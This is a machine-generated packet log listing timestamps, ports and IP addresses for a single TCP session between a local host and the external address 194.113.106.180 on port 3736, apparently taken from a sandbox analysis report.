Sep 15, 2024 15:02:27.322184086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322195053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322206020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322217941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322215080 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322254896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322258949 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322259903 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322290897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322324991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322334051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322359085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322398901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322408915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322443008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322479010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322483063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322511911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322555065 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322633028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322668076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322700977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322707891 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322737932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322772980 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322782993 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322807074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322844028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322868109 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.325638056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325670958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325690985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.325727940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325761080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325773001 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.325798035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325831890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325839996 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.325867891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.325907946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.332391977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332426071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332461119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332479954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.332494020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332529068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332535982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.332562923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332596064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.332606077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.343827963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343871117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343878031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.343888998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343905926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343924046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343930006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.343940020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343956947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343959093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.343971014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343981981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343993902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.343998909 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.344008923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.344021082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.344022036 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.344034910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.344048977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.344053030 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.344068050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.345815897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.345865965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.345869064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.345906019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.345937967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.345947981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.345993042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.346028090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.346038103 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.346065998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.346103907 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.350411892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350466967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350506067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350513935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.350574017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350609064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350615978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.350658894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350693941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.350704908 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365103960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365173101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365183115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365221977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365257025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365269899 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365293026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365329027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365334988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365364075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365396976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365402937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365432978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365473032 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365488052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365523100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365557909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365561962 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365609884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365643024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365648985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365721941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365756989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365761995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365797043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365834951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365834951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365871906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365906000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365912914 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.365942955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.365977049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.368251085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368287086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368323088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368344069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.368432999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368467093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368483067 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.368501902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368537903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.368544102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.376549959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376600981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.376604080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376672029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376708031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376717091 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.376745939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376780987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376806974 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.376815081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.376857042 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.380688906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380749941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380796909 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.380800962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380836964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380880117 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.380887985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380923986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380960941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.380966902 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.384844065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.384891987 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.384901047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.384936094 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.384975910 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.384989023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.385024071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.385059118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.385085106 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.385093927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.385135889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.401299000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401369095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401382923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401400089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401426077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401439905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401453972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.401463032 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.401463032 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.401504993 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.402579069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402591944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402602911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402621031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.402647018 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.402673960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402687073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402699947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402713060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402724028 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.402724028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.402744055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.406533003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.406610966 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.410830975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410886049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.410902023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410912991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410924911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410938025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410950899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410954952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.410964966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410990953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.410996914 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.411019087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.415626049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415640116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415651083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415673018 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.415694952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.415712118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415725946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415736914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415751934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.415761948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.415787935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.422751904 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422775030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422785044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422817945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.422862053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422873020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422884941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422897100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422900915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.422909975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.422916889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.422955036 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433111906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433163881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433198929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433218956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433233976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433280945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433289051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433322906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433357000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433366060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433389902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433423996 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433429003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433458090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433492899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433504105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433526993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433561087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433568001 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.433595896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.433640957 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.436717987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436773062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436806917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436820030 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.436861038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436894894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436904907 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.436928988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436963081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.436970949 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.440906048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.440957069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.440958977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.440994978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.441029072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.441039085 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.441065073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.441099882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.441102982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.441287041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.441329002 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.452816963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.452852964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.452884912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.452910900 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.452919960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.452955008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.452965975 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.453008890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.453042984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.453052044 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.453078985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.453119040 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.454971075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455005884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455039978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455051899 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.455092907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455127001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455133915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.455163002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455194950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455199003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.455229998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.455271006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.460189104 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.460220098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.460297108 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.461262941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461299896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461333990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461353064 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.461366892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461402893 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461409092 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.461438894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.461481094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.463027000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463066101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463099003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463114977 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.463151932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463184118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463193893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.463219881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463253021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463259935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.463289022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.463326931 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.477878094 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477894068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477905989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477945089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477957010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477967978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477967024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.477979898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.477993011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.478007078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.478034019 CEST	49701	3736	192.168.2.10	194.113.106.180
